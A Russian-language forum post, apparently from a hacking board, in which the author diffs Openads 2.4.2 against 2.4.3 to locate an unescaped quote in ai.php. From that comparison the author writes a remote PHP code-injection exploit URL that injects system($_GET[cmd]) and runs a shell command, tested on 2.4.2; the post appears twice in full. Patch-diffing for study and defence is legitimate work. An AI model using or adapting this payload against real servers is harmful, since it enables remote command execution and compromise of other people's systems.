(Dm)
23.05.2009, 18:15
Существует уязвимость:
Openads 2.4.0 <= x <= 2.4.2
Vulnerability: Remote PHP code injection and execution
Cплойта не нашел, собственно как и описание уязвимости.
Скачал Openads 2.4.2 и Openads 2.4.3
diff -r openads-2.4.2/www/delivery/ai.php openads-2.4.3/www/delivery/ai.php
28c28
< $Id: ai.php 12787 2007-11-26 10:00:33Z andrzej.swedrzynski@openads.org $
---
> $Id: ai.php 14232 2008-01-09 17:30:42Z andrzej.swedrzynski@openads.org $
1094,1097c1094,1100
< } elseif (preg_match('/^.+:.+$/', $what)) {
< list($whatName, $whatValue) = explode(':', $what);
< if ($whatName == 'zone') {
< $whatName = 'zoneid';
---
> } elseif (preg_match('/^(.+):(.+)$/', $what, $matches)) {
> switch ($matches[1]) {
> case 'zoneid':
> case 'zone': $zoneid = $matches[2]; break;
> case 'bannerid': $bannerid = $matches[2]; break;
> case 'campaignid': $campaignid = $matches[2]; break;
> case 'clientid': $clientid = $matches[2]; break;
1099,1100d1101
< global $$whatName;
< $$whatName = $whatValue;
1329c1330
< $cache_literal .= "$"."cache_name = '".addcslashes($name, "'")."';\n"; <- тут уязвимость
---
> $cache_literal .= "$"."cache_name = '".addcslashes($name, "\\'")."';\n";
После изучения функций этого скрипта написал сплоит:
http://localhost/www/delivery/ai.php?filename=antichat.jpg';system($_GET[cmd]);/*&contenttype=antichat&cmd=ls -la
проверял на Openads 2.4.2
Openads 2.4.0 <= x <= 2.4.2
Vulnerability: Remote PHP code injection and execution
Cплойта не нашел, собственно как и описание уязвимости.
Скачал Openads 2.4.2 и Openads 2.4.3
diff -r openads-2.4.2/www/delivery/ai.php openads-2.4.3/www/delivery/ai.php
28c28
< $Id: ai.php 12787 2007-11-26 10:00:33Z andrzej.swedrzynski@openads.org $
---
> $Id: ai.php 14232 2008-01-09 17:30:42Z andrzej.swedrzynski@openads.org $
1094,1097c1094,1100
< } elseif (preg_match('/^.+:.+$/', $what)) {
< list($whatName, $whatValue) = explode(':', $what);
< if ($whatName == 'zone') {
< $whatName = 'zoneid';
---
> } elseif (preg_match('/^(.+):(.+)$/', $what, $matches)) {
> switch ($matches[1]) {
> case 'zoneid':
> case 'zone': $zoneid = $matches[2]; break;
> case 'bannerid': $bannerid = $matches[2]; break;
> case 'campaignid': $campaignid = $matches[2]; break;
> case 'clientid': $clientid = $matches[2]; break;
1099,1100d1101
< global $$whatName;
< $$whatName = $whatValue;
1329c1330
< $cache_literal .= "$"."cache_name = '".addcslashes($name, "'")."';\n"; <- тут уязвимость
---
> $cache_literal .= "$"."cache_name = '".addcslashes($name, "\\'")."';\n";
После изучения функций этого скрипта написал сплоит:
http://localhost/www/delivery/ai.php?filename=antichat.jpg';system($_GET[cmd]);/*&contenttype=antichat&cmd=ls -la
проверял на Openads 2.4.2